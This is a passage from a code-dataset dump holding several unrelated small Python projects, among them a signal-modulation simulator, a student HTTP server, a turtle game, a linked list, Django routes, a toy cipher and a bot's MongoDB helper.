plt.plot(t, np.real(sinal_baseband))\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Sinal no Domínio do Tempo (Baseband)')\n plt.grid()\n\n plt.figure(2)\n plt.subplot(2, 1, 1)\n plt.plot(t, np.real(sinal_modulado))\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Sinal no Domínio do Tempo (Modulado)')\n plt.grid()\n\ndef plota_espectro(f, espectro_sinal_baseband, espectro_sinal_modulado):\n plt.figure(1)\n plt.subplot(2, 1, 2)\n plt.plot(f, np.real(espectro_sinal_baseband))\n plt.grid()\n\n plt.figure(2)\n plt.subplot(2, 1, 2)\n plt.plot(f, np.real(espectro_sinal_modulado))\n plt.grid()\n\nif __name__ == \"__main__\":\n T = 1\n snr = 10\n fc = 13.56e5\n fs = 20 * fc\n fb_ASK = 10e2\n\n t, sinal_baseband, sinal_modulado, m_ASK = gera_sinal_ASK(T, snr, fc, fb_ASK)\n m_ASK_r = recupera_sinal_ASK(t, sinal_modulado, fc, fb_ASK, fs)\n BER = calcula_BER(m_ASK, m_ASK_r)\n\n print(\"Taxa de Erro de Bit (BER): {:.5f}\".format(BER))\n\n df = 20 * 13.56e5 / len(t)\n f = (np.arange(0, len(t)) * df - 20 * 13.56e5 / 2)\n\n Z_ASKp = np.fft.fftshift(20 * np.log10(np.abs(np.fft.fft(sinal_baseband) + 1e-10)))\n Z_ASK = np.fft.fftshift(20 * np.log10(np.abs(np.fft.fft(sinal_modulado) + 1e-10)))\n\n\n plota_sinais_tempo(t, sinal_baseband, sinal_modulado)\n plota_espectro(f, Z_ASKp, Z_ASK)\n \n plt.show()\n","repo_name":"dev-victordias/iot","sub_path":"Simulations/NFC_simulator.py","file_name":"NFC_simulator.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35119932843","text":"# ## EJERCICIOS ##\n# 1 - Implementar un servidor http con el módulo http.server que sirva diferentes páginas utilizando como base el código analizado en clase.\n# 2- Utilizar links para navegar entre las distintas páginas.\n\nimport http.server\nimport socketserver\nimport urllib.parse\n\n# GET / HTTP/1.1\n\nPORT = 1111\n\n\nclass handler_manual (http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/':\n self.path = '/index.html'\n\n try:\n with open(self.path[1:], 'rb') as file:\n content = file.read()\n \n self.send_response(200)\n self.send_header('Content-Type', 'text/html')\n self.end_headers()\n self.wfile.write(content)\n\n except FileNotFoundError:\n self.send_error(404, 'Archivo no encontrado')\n \n\n def do_POST(self):\n if self.path == '/submit_form':\n input_data=self.rfile.read(int(self.headers['Content-Length']))\n print(\"INPUT DATA: \", input_data)\n \n response_content = \"¡Formulario enviado correctamente!\"\n self.send_response(200)\n self.send_header('Content-Type', 'text/html')\n self.end_headers()\n self.wfile.write(response_content.encode('utf-8'))\n else:\n self.send_error(404, 'Página no encontrada') \n\n\n \n \n\n\nsocketserver.TCPServer.allow_reuse_address = True\n\n#myhttphandler = http.server.BaseHTTPRequestHandler\n#myhttphandler = http.server.SimpleHTTPRequestHandler\nmyhttphandler = handler_manual\n\n\n#httpd = socketserver.TCPServer((\"\", PORT), myhttphandler)\nhttpd = http.server.HTTPServer((\"\", PORT), myhttphandler)\n#httpd = http.server.ThreadingHTTPServer((\"\", PORT), myhttphandler)\n\nprint(f\"Opening httpd server at port {PORT}\")\n\nhttpd.serve_forever()\n\nhttpd.shutdown()","repo_name":"AugustoKark/Computacion2_AK2023","sub_path":"Ejercicios_Clases/Clase17/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18618453507","text":"#!/bin/python3\n\nimport turtle\nimport random\nimport math\n\nphi = 360 / 7\nr = 50\n\ndef gotoxy(x,y):\n turtle.penup()\n turtle.goto(x,y)\n turtle.pendown()\n\ndef draw_circle(r,color):\n turtle.fillcolor(color)\n turtle.begin_fill()\n turtle.circle(r)\n turtle.end_fill()\n\ndef baraban(x,y):\n gotoxy(x,y)\n turtle.circle(80)\n gotoxy(x, y + 160)\n draw_circle(5, 'red')\n for i in range(0,7):\n phi_rad = phi * i * math.pi / 180.0\n gotoxy(x + math.sin(phi_rad) * r, y + math.cos(phi_rad) * r + 60)\n draw_circle(22, 'white')\n\ndef baraban_anim(x,y,start):\n for i in range(start,random.randrange(7,34)):\n phi_rad = phi * i * math.pi / 180.0\n gotoxy(x + math.sin(phi_rad) * r, x + math.cos(phi_rad) * r + 60)\n draw_circle(22, 'brown')\n draw_circle(22, 'white')\n gotoxy(x + math.sin(phi_rad) * r, x + math.cos(phi_rad) * r + 60)\n draw_circle(22, 'brown')\n return i % 7\n \n\n\nturtle.speed(0)\n\n\nbaraban(100,100)\n\nanswer = ''\nstart = 0\nwhile answer != 'N':\n answer = turtle.textinput(\"Let's play?\", \"Y/N\")\n\n if answer == 'Y':\n start = baraban_anim(100, 100, start)\n if start % 7 == 0:\n gotoxy(-150, 250)\n turtle.write(\"You loose\", font=(\"Arial\", 18, \"normal\"))\n else:\n pass","repo_name":"attonizee/python","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15336059016","text":"# -*- coding:utf-8 -*-\n\n\nclass Node(object):\n '''\n 单链表的节点\n '''\n\n def __init__(self, item):\n # item 是存储的数据\n self.item = item\n # next 是下一个节点的标示\n self.next = None\n\n\n# 单向链表\nclass SingleLinkList(object):\n def __init__(self):\n self.__head = None\n\n def is_empty(self):\n # 判断链表是否为空\n return self.__head == None\n\n def length(self):\n # 返回链表长度\n cur = self.__head\n count = 0\n while cur != None:\n count += 1\n cur = cur.next\n return count\n\n def travel(self):\n # 遍历链表\n cur = self.__head\n while cur != None:\n print(cur)\n cur = cur.next\n print('遍历完成')\n\n def add(self, item):\n # 头部添加\n '''\n 1.创建新的节点\n 2.将新节点的链接域next指向头节点,即__head指向的位置\n 3.将链表的头__head指向新节点\n '''\n node = Node(item)\n node.next = self.__head\n self.__head = node\n\n def append(self, item):\n '''\n 尾部添加\n :param item:数据\n 1.先判断链表是否为空,\n 2.空的话,直接将node赋值给head\n 3.不为空的话,遍历到最后一个元素 next==None\n 4.将最后一个元素的next赋值为node\n '''\n node = Node(item)\n if self.is_empty():\n self.__head = node\n else:\n cur = self.__head\n while cur.next != None:\n cur = cur.next\n cur.next = node\n\n def insert(self, pos, item):\n # 在某个位置添加\n # 指定位置在第一个元素之前,执行头部插入\n if pos <= 0:\n self.add(item)\n # 如果 指定位置 超过链表的尾部,执行 尾部插入\n elif pos > (self.length() - 1):\n self.append(item)\n else:\n # pre用来指向指定位置pos的前一个位置pos-1,初始从头节点开始移动到指定位置\n node = Node(item)\n count = 0\n pre = self.__head\n while count < (pos - 1):\n count += 1\n pre = pre.next\n # 先将新节点node的next指向插入位置的节点\n node.next = pre.next\n # 将插入位置的前一个节点的next指向新节点\n pre.next = node\n\n def remove(self, item):\n # 删除某个元素\n cur = self.__head\n pre = None\n while cur != None:\n # 找到了指定元素\n if cur.item == item:\n # 如果第一个就是删除的节点\n if not pre:\n # 将头指针指向头节点的后一个节点\n self.__head = cur.next\n else:\n # 将删除位置前一个节点的next指向删除位置的后一个节点\n pre.next = cur.next\n break\n else:\n # 继续按链表后移节点\n pre = cur\n cur = cur.next\n\n def search(self, item):\n # 判断元素是否在链表中\n cur = self.__head\n while cur != None:\n if cur.item == item:\n return True\n cur = cur.next\n return False\n\n\nif __name__ == '__main__':\n ll = SingleLinkList()\n ll.add(1)\n ll.add(2)\n ll.append(3)\n ll.insert(2, 4)\n print(\"length:\", ll.length())\n ll.travel()\n print(ll.search(3))\n print(ll.search(5))\n ll.remove(1)\n print(\"length:\", ll.length())\n ll.travel()\n","repo_name":"gkf442573575/learn","sub_path":"Python/algorithm/03_linkList.py","file_name":"03_linkList.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14539832463","text":"import math\r\nimport pygame\r\n\r\n# initialize pygame and create a window\r\npygame.init()\r\nsize2 = 600\r\nscreen = pygame.display.set_mode((size2, size2))\r\npygame.display.set_caption(\"Tic-Tac-Pyramid - By Eliran Breitbart\")\r\n\r\n#gloal variables\r\nglobal size # board size\r\nglobal curr_player # current player 0 or 1\r\nglobal scores # [p0 score, p1 score]\r\nglobal gameTable # 2d array\r\nglobal rects # the rects of the circles on the boards\r\nglobal lines # the lines for completed row/diagonal\r\nglobal radius # the radius of the circles (in case its needed to be changed later)\r\n\r\n\r\n# prints the board in the terminal - for use in debugging if needed\r\ndef print_game_table():\r\n width = len(', '.join(map(str, gameTable[size - 1])))\r\n for i in range(size):\r\n print(', '.join(map(str, gameTable[i][0:i + 1])).center(width, ' '))\r\n\r\n\r\n# disable the right part of the board\r\ndef disable_blocks():\r\n for row in range(size):\r\n for col in range(row + 1, size):\r\n gameTable[row][col] = -1\r\n\r\n\r\n# initialize / reset the board\r\ndef initialize_data():\r\n global size, curr_player, scores, gameTable, rects, lines\r\n curr_player = 0\r\n scores = [0, 0]\r\n gameTable = [[0 for i in range(size)] for j in range(size)]\r\n disable_blocks()\r\n rects = []\r\n lines = []\r\n for row in range(size):\r\n curr = []\r\n for col in range(row + 1):\r\n curr.append(\"\")\r\n rects.append(curr)\r\n\r\n\r\n# check if we have completed a horizontal line, return points, add line to draw over\r\ndef completed_horizontal(row):\r\n for row_col in gameTable[row]:\r\n if row_col == 0:\r\n return 0\r\n for col in range(row + 1):\r\n gameTable[row][col] = -1\r\n lines.append([(rects[row][0].x - radius, rects[row][0].y + radius),\r\n (rects[row][row].x + 3 * radius, rects[row][row].y + radius)])\r\n return row + 1\r\n\r\n\r\n# check if we have completed a diagonal right-to-left, return points, add line to draw over\r\ndef completed_right_left(col):\r\n for row in range(size):\r\n if gameTable[row][col] == 0:\r\n return 0\r\n for row in range(size):\r\n gameTable[row][col] = -1\r\n lines.append([(rects[col][col].x + radius * (0.5 + math.sqrt(2)), rects[col][0].y + radius * (1 - math.sqrt(2))), (\r\n rects[size - 1][col].x + radius * (-1.25 + math.sqrt(2)), rects[size - 1][col].y + radius * (1 + math.sqrt(2)))])\r\n return size - col # size = length + 1\r\n\r\n\r\n# check if we have completed diagonal left-to-right, return points, add line to draw over\r\ndef completed_left_right(row, col):\r\n points = 0\r\n n_row = row - col\r\n n_col = 0\r\n for i in range(size - row + col):\r\n if gameTable[n_row][n_col] == 0:\r\n return 0\r\n n_row += 1\r\n n_col += 1\r\n n_row = row - col\r\n n_col = 0\r\n for i in range(size - row + col):\r\n gameTable[n_row][n_col] = -1\r\n n_row += 1\r\n n_col += 1\r\n points += 1\r\n lines.append(\r\n [(rects[row - col][0].x + radius * (1.5 - math.sqrt(2)), rects[row - col][0].y + radius * (1 - math.sqrt(2))), (\r\n rects[size - 1][size - row + col - 1].x + radius * (0.5 + math.sqrt(2)),\r\n rects[size - 1][size - row + col - 1].y + radius * (1 + math.sqrt(2)))])\r\n return points\r\n\r\n\r\n# returns all the points earned by filling circle (row,col)\r\ndef check_for_completed_lines(row, col):\r\n return completed_horizontal(row) + completed_right_left(col) + completed_left_right(row, col)\r\n\r\n\r\n# checks if the game has ended by calculating total points.\r\ndef check_game_ended():\r\n total_aqc_points = 3 * ((size * (size + 1)) // 2)\r\n if scores[0] + scores[1] == total_aqc_points:\r\n return True\r\n return False\r\n\r\n\r\n# updates the board when an available circle is chosen\r\ndef choose_point(row, col):\r\n global curr_player\r\n if gameTable[row][col] == 0:\r\n gameTable[row][col] = 1\r\n scores[curr_player] += check_for_completed_lines(row, col)\r\n curr_player = abs(curr_player - 1)\r\n print_game_table()\r\n else:\r\n print(\"player {}, you cannot fill this spot, try again\".format(curr_player))\r\n\r\n\r\n# draws all the lines\r\ndef draw_lines(lines):\r\n for coord in lines:\r\n pygame.draw.line(screen, (255, 255, 255), coord[0], coord[1], 3)\r\n\r\n\r\n# main game loop\r\ndef start_game():\r\n global rects\r\n global size\r\n global lines\r\n global radius\r\n clock = pygame.time.Clock()\r\n lines = []\r\n size = 10\r\n pygame.font.init()\r\n initialize_data()\r\n font = pygame.font.SysFont(None, 30)\r\n font2 = pygame.font.SysFont(\"comicsansms\", 20)\r\n font3 = pygame.font.SysFont(\"comicsansms\", 15)\r\n text_surface = font.render(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1], curr_player + 1),\r\n False, (255, 255, 255))\r\n texts = list(map(lambda x: font2.render(x, False, (255, 255, 255)),\r\n [\"r : restart\", \"- : smaller board\", \"+ : bigger board\"]))\r\n # game loop\r\n running = True\r\n radius = 25\r\n start = (size2 / 2, 50)\r\n\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_r:\r\n initialize_data()\r\n if event.key == pygame.K_PLUS or event.key == pygame.K_EQUALS:\r\n if size + 1 <= 10:\r\n size += 1\r\n initialize_data()\r\n if event.key == pygame.K_MINUS:\r\n if size - 1 >= 3:\r\n size -= 1\r\n initialize_data()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n for row in range(len(rects)):\r\n for col in range(len(rects[row])):\r\n rect = rects[row][col]\r\n if rect.collidepoint(event.pos):\r\n choose_point(row, col)\r\n # clear the screen\r\n screen.fill((0, 0, 0))\r\n # draw the game board\r\n for row in range(size):\r\n for col in range(row + 1):\r\n rects[row][col] = pygame.draw.circle(screen,\r\n (255, 0, 0) if gameTable[row][col] != 0 else (255, 255, 255),\r\n (start[0] + col * 55 - row * 27.5, start[1] + row * 47), 25)\r\n if gameTable[row][col] == 0 and rects[row][col].collidepoint(pygame.mouse.get_pos()):\r\n rects[row][col] = pygame.draw.circle(screen, (0, 0, 255),\r\n (start[0] + col * 55 - row * 27.5, start[1] + row * 47), 25)\r\n text_surface = font.render(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1], curr_player + 1),\r\n False, (255, 255, 255))\r\n screen.blit(text_surface, (size2 / 2 - font.size(\r\n \"player1 score: {0}, player2 score: {1}, Current Player: {2}\".format(scores[0], scores[1],\r\n curr_player + 1))[0] / 2,\r\n rects[size - 1][0].y + 70))\r\n draw_lines(lines)\r\n for idx, text in enumerate(texts):\r\n screen.blit(text, (10, idx * 22))\r\n if check_game_ended():\r\n text_surface = font.render(\"Game Ended, player {} wins\".format(1 if scores[0] > scores[1] else 2), False,\r\n (255, 255, 255))\r\n screen.blit(text_surface, (size2 / 2 - text_surface.get_size()[0] / 2, rects[size - 1][0].y + 100))\r\n pygame.display.update()\r\n clock.tick(30)\r\n\r\n\r\nstart_game()\r\n","repo_name":"EliranBreitbart/Pyramid_Game","sub_path":"game_ui.py","file_name":"game_ui.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28023511089","text":"from django.contrib.auth.views import LogoutView\nfrom Django_blog_project import settings\nfrom django.urls import path, include\nfrom blog.views import *\n\nurlpatterns = [\n path('', MainView.as_view(), name='main'),\n path('blog/', PostsView.as_view(), name='posts'),\n path('blog//', PostDetailView.as_view(), name='post_detail'),\n path('signup/', SignUpView.as_view(), name='signup'),\n path('signin/', SignInView.as_view(), name='signin'),\n path('signout/', LogoutView.as_view(), {'next_page': settings.LOGOUT_REDIRECT_URL}, name='signout'),\n path('contact/', FeedBackView.as_view(), name='contact'),\n path('success/', AboutUSView.as_view(), name='about_us'),\n path('search/', SearchResultsView.as_view(), name='search_results'),\n path('tag//', TagView.as_view(), name=\"tag\"),\n path('category//', CategoryView.as_view(), name=\"category\"),\n path('privacy-policy/', PrivacyPolicy.as_view(), name='privacy_policy'),\n path('', AuthorPage.as_view(), name='author_page'),\n path('blog//comments/create/', CommentCreateView.as_view(), name='comment_create_view'),\n path('user/edit/', ProfileUpdateView.as_view(), name='profile_edit'),\n path('user//', ProfileDetailView.as_view(), name='profile_detail'),\n path('post/create/', PostCreateView.as_view(), name='post_create'),\n path('post//update/', PostUpdateView.as_view(), name='post_update'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete'),\n]\n","repo_name":"melxiory/Django_blog_project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73554240693","text":"from tkinter import Tk\r\nfrom tkinter import Button\r\nfrom project import reset_quiz\r\nfrom project import get_words\r\nimport project\r\nimport csv\r\nimport pandas as pd\r\nfrom project import delete_row \r\n\r\ndef test_get_words():\r\n # Create a temporary CSV file with known data\r\n word = \"cat\"\r\n meaning = \"animal\"\r\n \r\n with open(\"dictionary.csv\", \"w\", newline=\"\") as file:\r\n writer = csv.DictWriter(file, fieldnames=[\"word\", \"meaning\"])\r\n writer.writerow({\"word\": word, \"meaning\": meaning})\r\n\r\n # Call the get_words function and get the results\r\n meaning_list, word_list, dictionary = project.get_words() # Replace 'your_module' with the actual module name\r\n\r\n # Define the expected results\r\n expected_meaning_list = [\"animal\"]\r\n expected_word_list = [\"cat\"]\r\n expected_dict = [{\"meaning\": \"animal\",\"word\": \"cat\"}]\r\n\r\n # Check if the results match the expected values using pytest assertions\r\n assert meaning_list == expected_meaning_list\r\n assert word_list == expected_word_list\r\n assert dictionary == expected_dict\r\n\r\n# Test for reset_quiz\r\ndef test_reset_quiz():\r\n root = Tk()\r\n button = Button(root, text=\"Start Quiz\")\r\n button.pack()\r\n \r\n reset_quiz()\r\n \r\n assert len(root.winfo_children()) == 1\r\n\r\ndef test_delete_row():\r\n # Create a sample CSV file with data for testing\r\n data = {'word': ['apple', 'banana', 'cherry'], 'meaning': ['fruit', 'fruit', 'fruit']}\r\n df = pd.DataFrame(data)\r\n df.to_csv('sample_dictionary.csv', index=False)\r\n\r\n # Initially, the sample CSV should have 3 rows\r\n initial_data = pd.read_csv('sample_dictionary.csv')\r\n assert len(initial_data) == 3\r\n\r\n k = (1, \"sample_dictionary.csv\")\r\n # Delete the second row (index 1)\r\n delete_row(k)\r\n\r\n # Reload the data after deletion\r\n updated_data = pd.read_csv('sample_dictionary.csv')\r\n\r\n # Check if the row was removed\r\n assert len(updated_data) == 2\r\n assert updated_data.iloc[0]['word'] == 'apple'\r\n assert updated_data.iloc[1]['word'] == 'cherry'\r\n\r\n # Teardown: Remove the sample CSV file\r\n import os\r\n os.remove('sample_dictionary.csv')","repo_name":"mea1234/dictionary-app-with-python","sub_path":"test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28448880791","text":"from random import choice\n\ndef decode_Ggg(keys, text):\n keys_words = dict(zip(keys.split()[1::2], keys.split()[0::2]))\n text_decrypt = \"\"\n s = \"\"\n for c in text:\n if c == \"g\" or c == \"G\":\n s += c\n else:\n text_decrypt += c\n \n if s in keys_words.keys():\n text_decrypt += keys_words[s]\n s = \"\"\n return text_decrypt\n\n\ndef encode_Ggg(text):\n keys = list()\n keys_words = dict()\n text_encrypt = \"\"\n aKey = \"\"\n i = 0\n words = set([c for c in text if c.isalpha()])\n \n while i < len(words):\n akey = \"\".join(choice(\"Gg\") for _ in range(3))\n \n if akey not in keys:\n keys.insert(i, akey)\n i+=1\n \n keys_words = dict(zip(words, keys))\n \n for c in text:\n if c.isalpha():\n text_encrypt += keys_words[c]\n else:\n text_encrypt += c\n keys = ' '.join('{}{}'.format(key+\" \", val) for key, val in keys_words.items())\n \n return keys, text_encrypt\n\nprint(decode_Ggg(\"H GgG d gGg e ggG l GGg o gGG r Ggg w ggg\",\n \"GgGggGGGgGGggGG, ggggGGGggGGggGg!\"))\nprint(encode_Ggg(\"Hello, World!\"))\n\n \n\n\n","repo_name":"freddiev4/dailyprogrammerchallenges","sub_path":"Intermediate Challenges/Challenge 0245 Intermediate - Ggggggg gggg Ggggg-ggggg!/solutions/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":313,"dataset":"github-code","pt":"21"} +{"seq_id":"28428154515","text":"import logging\nimport os\nimport traceback\nfrom codecs import decode, encode\nfrom functools import lru_cache\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom motor.core import AgnosticCollection\nfrom motor.motor_asyncio import (\n AsyncIOMotorClient,\n AsyncIOMotorCollection,\n AsyncIOMotorDatabase,\n)\nfrom pymongo.errors import OperationFailure\nfrom yaml import full_load\n\nfrom .base import Base # pylint: disable=R0401\nfrom .errors import BackupError\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass DataBase(Base):\n \"\"\"Client Database on MongoDB\"\"\"\n\n __client__: AsyncIOMotorClient\n __db__: AsyncIOMotorDatabase\n __lang__: AsyncIOMotorCollection\n __language__: List[str]\n __list_collection__: List[str]\n __strings__: Dict[str, str]\n __chat_lang__: Dict[int, str]\n\n def __init__(self):\n self.__language__ = sorted(\n [os.path.splitext(filename)[0] for filename in os.listdir(\"./language\")]\n )\n self.__strings__ = {}\n self.__chat_lang__ = {}\n\n super().__init__()\n\n @property\n def language(self) -> list:\n \"\"\"Return list of bot suported languages\"\"\"\n return self.__language__\n\n @property\n def lang_col(self) -> AgnosticCollection:\n \"\"\"Return client language collection\"\"\"\n return self.__lang__\n\n def _load_language(self):\n \"\"\"Load bot language.\"\"\"\n LOGGER.info(\"Loading language...\")\n for i in self.__language__:\n LOGGER.debug(f\"Loading language: {i}\")\n with open(f\"./language/{i}.yml\", \"r\") as text:\n self.__strings__[i] = full_load(text)\n LOGGER.debug(f\"Language {self.__language__} loaded\")\n\n async def connect_db(self, db_name: str) -> None:\n \"\"\"Connect to MongoDB client\n\n Parameters:\n db_name (`str`): Database name to log in. Will create new Database if not found.\n \"\"\"\n LOGGER.info(\"Connecting to MongoDB...\")\n try:\n self.__client__ = AsyncIOMotorClient(self.get_config.db_uri, connect=False)\n if db_name in await self.__client__.list_database_names():\n LOGGER.debug(\"Database found, Logged in to Database...\")\n else:\n LOGGER.debug(\"Database not found! Creating New Database...\")\n except OperationFailure as err:\n traceback.print_exc()\n LOGGER.critical(f\"DATABASE AUTHENTICATION FAILED\\n{err}\")\n await self.loop.stop()\n\n self.__db__ = self.__client__[db_name]\n self.__list_collection__ = await self.__db__.list_collection_names()\n LOGGER.info(\"Database connected\")\n self.__lang__ = self.get_collection(\"LANGUAGE\")\n async for i in self.__lang__.find():\n self.__chat_lang__[i[\"chat_id\"]] = i[\"language\"]\n\n async def disconnect_db(self) -> None:\n \"\"\"Disconnect database client\"\"\"\n self.__client__.close()\n LOGGER.info(\"Disconnected from database\")\n\n def get_collection(self, name: str) -> AgnosticCollection:\n \"\"\"Get collection from database.\n\n Parameters:\n name (`str`): Collection name to fetch\n \"\"\"\n if name in self.__list_collection__:\n LOGGER.debug(f\"Collection {name} Found, fetching...\")\n else:\n LOGGER.debug(f\"Collection {name} Not Found, Creating New Collection...\")\n return self.__db__[name]\n\n @lru_cache(maxsize=100)\n def get_lang(self, chat_id) -> str:\n \"\"\"Get user language setting.\"\"\"\n return self.__chat_lang__.get(chat_id, \"en\")\n\n async def switch_lang(self, chat_id: Union[str, int], language: str) -> None:\n \"\"\"Change chat language setting.\"\"\"\n await self.__lang__.update_one(\n {\"chat_id\": int(chat_id)},\n {\"$set\": {\"language\": language}},\n upsert=True,\n )\n self.__chat_lang__[int(chat_id)] = language\n self.get_lang.cache_clear()\n\n async def migrate_chat(self, old_chat: int, new_chat: int):\n \"\"\"Run all migrate handler on every migrateable plugin\"\"\"\n LOGGER.debug(f\"Migrating chat from {old_chat} to {new_chat}\")\n for plugin in list(self.plugins.values()):\n if hasattr(plugin, \"__migrate__\"):\n await plugin.__migrate__(old_chat, new_chat)\n\n async def text(\n self,\n chat_id: int,\n name: str,\n *args: Optional[Any],\n **kwargs: Optional[Any],\n ) -> str:\n \"\"\"Parse the string with user language setting.\n\n Parameters:\n chat_id (`int`):\n Id of the sender(PM's) or chat_id to fetch the user language setting.\n\n name (`str`):\n String name to parse. The string is parsed from YAML documents.\n\n *args (`any`, *Optional*):\n One or more values that should be formatted and inserted in the string.\n The value should be in order based on the language string placeholder.\n\n **kwargs (`any`, *Optional*):\n One or more keyword values that should be formatted and inserted in the string.\n based on the keyword on the language strings.\n\n special parameters:\n noformat (`bool`, *Optional*):\n If exist and True, the text returned will not be formated.\n Default to False.\n\n \"\"\"\n lang = self.get_lang(chat_id)\n noformat = bool(kwargs.get(\"noformat\", False))\n\n if lang in self.__language__ and name in self.__strings__[lang]:\n text = decode(\n encode(\n self.__strings__[lang][name],\n \"latin-1\",\n \"backslashreplace\",\n ),\n \"unicode-escape\",\n )\n return text if noformat else text.format(*args, **kwargs)\n err = \"NO LANGUAGE STRING FOR {} in {}\".format(name, lang)\n LOGGER.warning(err)\n # try to send the english string first if not found\n try:\n text = decode(\n encode(\n self.__strings__[\"en\"][name],\n \"latin-1\",\n \"backslashreplace\",\n ),\n \"unicode-escape\",\n )\n return text if noformat else text.format(*args, **kwargs)\n except KeyError:\n return err + \"\\nPlease forward this to @ProtectorChats\"\n\n async def backup_plugin_data(\n self, chat_id: int, data: Optional[Dict] = None\n ) -> Union[Dict, None]:\n \"\"\"Backup chat data\n\n Parameters:\n chat_id (`int`):\n Id of the sender(PM's) or chat_id to fetch the user language setting.\n data (`dict`, *Optional*):\n Data to restore. Only pass this if you want to restore.\n\n Returns:\n dict of backup if no data passed, otherwise None.\n \"\"\"\n if not isinstance(data, (type(None), dict)):\n raise BackupError(f\"Data must be a dict or Nonetype not {data.__class__.__name__}\")\n\n LOGGER.debug(\"{} chat data from {}\", \"Importing\" if data else \"Exporting\", chat_id)\n result = {\"chat_id\": chat_id}\n for plugin in list(self.plugins.values()):\n if hasattr(plugin, \"__backup__\"):\n if not data:\n LOGGER.debug(f\"Backing up {plugin.name} data\")\n plugin_data = await plugin.__backup__(chat_id)\n if not isinstance(plugin_data, (type(None), dict)):\n raise BackupError(\n f\"Unexpected return value type from `{plugin.name}` plugin: \"\n \"expecting a dict or NoneType, \"\n f\"got {plugin_data.__class__.__name__}\"\n )\n if not plugin_data: # skip plugin if no data\n continue\n result.update({plugin.name: plugin_data})\n else:\n LOGGER.debug(f\"restoring {plugin.name} data\")\n await plugin.__backup__(chat_id, data)\n return result if not data else None\n","repo_name":"iamarch/Protector","sub_path":"Protector/core/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22328108766","text":"\n#https://www.spoj.com/problems/MST/\nimport sys\nfrom collections import defaultdict\ntry: \n\tsys.stdin = open('input.txt', 'r') \n\tsys.stdout = open('output.txt', 'w')\n\nexcept: \n\tpass\n\n\n\nclass DisjointSet():\n def __init__(self,n):\n self.parent=[]\n self.rank=[]\n for i in range(n+1):\n self.parent.append(i)\n self.rank.append(0) #default rank\n\n def find(self,node):\n if(node==self.parent[node]):\n return node\n node=self.find(self.parent[node]) #path compression\n return node\n\n def union(self,u,v):\n leader_u=self.find(u)\n leader_v=self.find(v)\n if(self.rank[leader_u]>self.rank[leader_v]):\n u,v=v,u\n leader_u,leader_v=leader_v,leader_u\n if(leader_u!=leader_v):\n self.parent[leader_u]=leader_v #update pointer\n self.rank[leader_v]+=1 #update rank\n \ndef hasSingleCycle(array):\n # Write your code here.\n \n n=len(array)\n ds=DisjointSet(n)\n for i,jumps in enumerate(array):\n u=i\n v=(i+jumps)%n\n print(u,v)\n if(ds.find(u)==ds.find(v)):\n return True\n ds.union(u,v)\n \n \n \n return False\n \n \n \n \nprint(hasSingleCycle([2,3,1,-4,-4,2]))\n\n\n\n\n\n\n\t\t\n\n\t\t\n\t\t\t\t\n\n\n\n\n\t\t\n\n","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Disjoint Sets/MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22141320454","text":"import sys\n\ndef quicksort(arr):\n\tarr = helpersort(arr, 0, len(arr) - 1)\n\treturn arr\n\ndef helpersort(arr, low, pivote):\n\tif pivote - low <= 1:\n\t\treturn arr\n\n\tcount = low\n\tfor i in range(low,pivote):\n\t\tif arr[i] < arr[pivote]:\n\t\t\tarr[i], arr[count] = arr[count], arr[i]\n\t\t\tcount += 1\n\n\tarr[pivote], arr[count] = arr[count], arr[pivote]\n\t\n\tarr = helpersort(arr, low, count - 1)\n\tarr = helpersort(arr, count + 1, pivote)\n\n\treturn arr\n\ndef replaces(arr, i, j):\n\tarr[i] = arr[i].replace('[', '')\n\tarr[j] = arr[j].replace(']', '')\n\treturn arr\n\nif len(sys.argv) > 1:\n\tarr = sys.argv[1:]\n\n\tif len(arr) == 1:\n\t\tarr = replaces(arr, 0, 0)\n\t\tarr = arr[0].split(',')\n\n\tn = len(arr)\n\tarr = replaces(arr, 0, n-1)\n\t\n\tarr1 = []\n\tfor i in range(0, n):\n\t\tif arr[i] != '' and arr[i] != '':\n\t\t\tarr[i] = arr[i].replace(',', 